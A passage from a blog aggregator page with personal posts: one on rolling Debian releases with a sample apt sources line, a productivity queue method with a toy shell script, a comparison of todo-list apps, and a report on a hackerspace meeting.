    Every six months the internet lights up with stories that Canonical & Co. have done the unthinkable: they have increased the number following the word Ubuntu. In other words, they have released a new version. This is a well-understood concept for differentiating releases of software. As the version increases it is expected that new features are introduced and old bugs are removed (hopefully more are removed than added).

    Versioning distributions and releasing the versions separately is a common practice, employed by most if not all distributions out there. Ubuntu has adopted the policy of releasing regularly and quite often. But there is a different approach; it revolves around a concept I call "Versionless", where you do not have a hard release but instead let the changes trickle down. In the application world such releases are often called nightly builds. With distributions it is a little bit different.

    First of all, it's worth noting that distributions are not like applications. Distributions are collections of applications plus a kernel; the applications that are included are usually stable releases, so the biggest unpredictability comes from their combination and configuration. As a result, one of the important roles for distro developers is to ensure that the combination of the many applications does not lead to adverse side effects. This is done in several ways; the general method is to mix all the applications in a pot, the so-called pre-release, and then test the combination. The testing is done by the whole community, as users often install these pre-releases to see if they notice any quirks through their regular use. When the pre-release becomes stable enough it is pushed out the door as a public release.

    In an ideal world, after this whole process all the major bugs and issues would have been resolved, and users would go on to re-install or update their installations to the new release without any issues. The problem is that even tests passed with flying colors do not guarantee that users will not experience problems. The more complicated a user's configuration, the more likely they are to notice bugs as part of an upgrade. This is particularly evident where there are multiple interacting systems. After a full upgrade of a distribution, it is not always obvious which change in the update caused a given problem.

    Versionless distributions are nothing new; they have been a staple of Debian for a while. In fact, this is the process for testing package compatibility between releases, but it is also a lot more. There are two Debian releases that follow this paradigm: Debian Testing and Debian Unstable. As applications are packaged they are added to Unstable, and after they fulfill certain criteria (i.e. they have spent some time in Unstable and have not had any critical bugs filed against them) they are passed along to Testing. Users are able to balance their needs between new features and stability by selecting the corresponding repository. As soon as packages are added to the repositories they become immediately available to users for install/upgrade.
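    Tracking one of these rolling suites comes down to the apt configuration. A minimal /etc/apt/sources.list sketch (the mirror URL is illustrative):

```
# Track Debian Testing as a rolling release; packages trickle in from
# Unstable once they meet the migration criteria described above.
deb http://ftp.us.debian.org/debian testing main
deb-src http://ftp.us.debian.org/debian testing main
```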

    What it really comes down to is that testing outside your own environment is useful, but it cannot be relied upon solely. And when upgrades are performed, it is important to know what has changed and how to undo it. Keeping track of the changes in thousands of updates at once is nearly impossible. So update small and update often; use Debian. Good package managers are your best friend, second only to great package developers!

    by dotCOMmie at May 14, 2010 11:03 PM

    April 10, 2010

    Jonathan Dahan


    This is the anti-lifehack.

    By eschewing organization schemes this design pattern forces immediate action.

    No tags, folders or priorities allowed - either deal with item X now, or place it on the bottom of the queue.

    If it seems overwhelming, try determining how much time you would like to work on anything, and find an item that can have measurable progress in that period. I have applied this to my email inbox, rss feeds, and todo lists.

    When applied to my email, I realized I had too many messages incoming. It forced me to unsubscribe from at least a dozen mailing lists, and over 99% of my emails are archived (which means they are dealt with). Zero inbox is attainable but not necessary - set small goals, like reducing the net amount by 5 every day.

    When applied to my rss reader, I realized I had too many feeds, and would really only read a few anyway. I bookmarked the sites that I loved but rarely read, and decided to return to them later. Also, I hid item counts.

    When applied to my todo list, I realized I had more stuff than time to do it in, which forced me to get very good at prioritizing and picking what needed to be done immediately. This required a bit more diligence about actually adding stuff to the todo list, though it's great to cross off items.
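    The "act now or send it to the back" rule is easy to mechanize. A toy sketch, with the queue as a plain text file (the file name and items are made up):

```shell
# Toy model of the anti-lifehack queue: a plain text file, one item per line.
# There are only two operations: pop takes the head of the queue, and defer
# sends the head to the back instead of acting on it. No tags, no priorities.
queue=$(mktemp)
printf 'answer email\nfix arduinome\nwrite blog post\n' > "$queue"

pop()   { head -n 1 "$queue"; sed -i '1d' "$queue"; }
defer() { item=$(pop); printf '%s\n' "$item" >> "$queue"; }

defer          # can't deal with "answer email" right now; it goes to the back
pop            # prints "fix arduinome": deal with it, there is no third option
```

The point of the sketch is that only two operations exist; anything like tagging or reprioritizing would have to be smuggled in as a third.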

    April 10, 2010 07:00 AM

    December 21, 2009

    Tom "supertom" Melendez

    My Todo List Search

    Having gone through some GTD training recently, I set out on my hunt for the best todo list system for me. First off, let me say that I’m not a GTD purist by any means and in fact have been doing something that somewhat resembles GTD for a few years now, but I certainly like some of its principles. Anyway, here are my (slim) requirements:

    1. Website – no desktop software required.
    2. Mobile access – ideally an iPhone app, and it must have identical functionality to the website
    3. Concept of Tasks, due dates, and priorities
    4. Repeating tasks are a nice-to-have
    5. Free is a nice-to-have

    With those in place, I set out and evaluated these, with some of my brief comments:

    • – mobile interface too simple; you can only view tasks from your mobile, no updating/deleting
    • (RTM) – probably the most suited to my needs, but due to their terms I’m essentially paying $25 a year to support their iPhone developer. $25 is what one pays for Flickr, and that is a much more valuable service IMO. The phone app has a 15-day trial.
    • – looks awesome, but doesn’t support priorities, due dates, or “tasks” from the web interface from what I can see. I was told that it does do this from the desktop app, but I really want a website and mobile app, that’s it.
    • Errands (iPhone app) – I thought this app was great and many people like it, but it has no website to go along with it, which means all data entry needs to happen on the phone. I’m not one of these people married to a PIM, so this is in the realm of possibility for me, but I ultimately decided I need a website to sync up with.
    • – website plus mobile website, but no priority or due date
    • – iPhone plus website; has due dates but no priorities, though you can sort the list, so that can be your priority. You have to buy the iPhone app, but they have a demo video on the website.
    • – website/mobile website – due dates but no priorities; you lose completed items unless you move them to another list, but you can’t move between lists on your mobile device.

    As it stands now, I’m using RTM and am still in the 15 day window. Zenbe Lists is definitely a close second and I’ll reevaluate that before my 15 days expire with RTM.

    by supertom at December 21, 2009 05:53 AM

    November 10, 2009

    Jonathan Dahan

    awesome island labs meeting

    So we had three new faces at Island Labs today. Eric Forkosh is an experienced inventor who brought a cool GSM development board. Mary Ellen Walsh is a charming writer who came to observe our group to help research hackerspaces for Newsday. And Kent (whose last name I cannot remember!) is a friendly and inquisitive photo/videographer who captured the meeting, also for Newsday.

    Our corn starch experiments have finally paid off! Laurie donated a speaker that kupo and Tony wrapped with Saran wrap. Jonathan hooked up the synth and, with the help of Justin and kupo, got some really crazy shapes and tendrils to dance! Bill explained how non-Newtonian fluids work and talked a bit about the near-space launch.

    Justin and Jonathan got the arduino to run a test program for a hobby servo, while Jan and Eric worked out some equations on how much torque would be needed to turn the doorknob for the magic door project.

    In the holiday spirit, Chris soldered together an LED electric Christmas tree!

    Thanks to everyone who came out, with special thanks to Mary and Kent, who really just let us do our thing, and were great company.

    Pics will be posted soon!

    November 10, 2009 08:00 AM

    October 11, 2009

    Jonathan Dahan